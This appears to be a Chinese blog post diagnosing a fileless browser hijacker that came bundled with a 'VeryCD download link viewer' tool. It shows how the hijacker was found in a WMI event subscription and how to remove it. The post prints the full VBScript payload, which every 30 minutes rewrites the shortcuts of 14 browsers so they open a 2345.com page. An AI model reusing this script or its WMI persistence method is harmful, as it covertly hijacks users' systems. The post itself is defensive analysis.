近日在網(wǎng)上相續(xù)看到有網(wǎng)友表示自己在下載使用了VeryCD下載鏈接查看器這款工具以后，再打開瀏覽器就被直接跳轉到 www.2345.com/?kunown 這個導航頁面了，而且打開多個瀏覽器：IE、Chrome、Firefox、Opera、Safari、Maxthon，均相同癥狀，檢查瀏覽器首頁設置——均正常！

最后發(fā)現(xiàn)，原來快速啟動欄的IE瀏覽器快捷命令被其修改，修改后的類似如下圖，于是認為就是普通的修改快捷方式，手工刪除 2345 網(wǎng)址的部分，但半小時后再次被更改了。考慮到可能加載了啟動項，在注冊表、啟動項、服務等中均未查找到相關信息，重啟后IE快捷方式被重新篡改。嘗試了事件查看器和任務計劃，均未在里面查出任何信息。

之后又安裝了超級兔子、360、exterminateit等工具進行檢查，也未檢出。

打開ProcessMonitor進行監(jiān)視，發(fā)現(xiàn)每隔30分鐘出現(xiàn)一個scrcons.exe進程自動啟動并修改快速啟動欄的命令，然后自動關閉（幸虧是30分鐘一次，你要是24小時一次，那我就杯具了……），修改Win7下opera快速啟動圖標路徑類似如下：

C:/Users/iefans/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/User Pinned/TaskBar/Opera12.01 1532.lnk

查找資料，發(fā)現(xiàn)這應該是一個通過WMI發(fā)起的定時自動運行腳本。要查看WMI事件，到以下地址下載WMITool并安裝

http://www.microsoft.com/en-us/download/details.aspx?id=24045

安裝后打開WMI event viewer，點擊左上角register for events，彈出Connect to namespace框，填入“root/subscription”（手工復制粘貼啊，默認出現(xiàn)的不是這個），確定，出現(xiàn)下圖：

點擊左側_EventFilter:Name="unown_filter"，再至右側右鍵點擊ActiveScriptEventConsume r Name="unown"，右鍵選擇view instant properties，如下圖：

查看ScriptText項可知，這是一段VBScript調用系統(tǒng)服務間隔30分鐘執(zhí)行一次，將所有瀏覽器調用加上“http://www.2345.com/?kunown”！抓住你了~！隱藏的夠深，沒常駐進程，沒有文件（把自己存儲在WMI數(shù)據(jù)庫中）。

受到影響的瀏覽器有（各色瀏覽器，差不多齊了）：

"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"

具體代碼如下：

On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:/Users/Gemini/Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:/Users/Gemini/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch":UserPinnedStartMenu = QuickLaunch & "/User Pinned/StartMenu":UserPinnedTaskBar = QuickLaunch & "/User Pinned/TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后，清除方法：在WMI event viewer中將“_EventFilter:Name="unown_filter"”項目右鍵刪除！

刪不掉？

到WMITool安裝路徑（例如：C:/Program Files (x86)/WMI Tools）下，右鍵點擊wbemeventviewer.exe，選擇以管理員身份運行！刪之！

還沒完，還要手動將快速啟動欄中，將各個瀏覽器快捷命令中的http://www.2345.com/?kunown去掉！

暫時就這么多了，還有沒有其它影響的話，用用再看吧！

解決方法來自：Gemini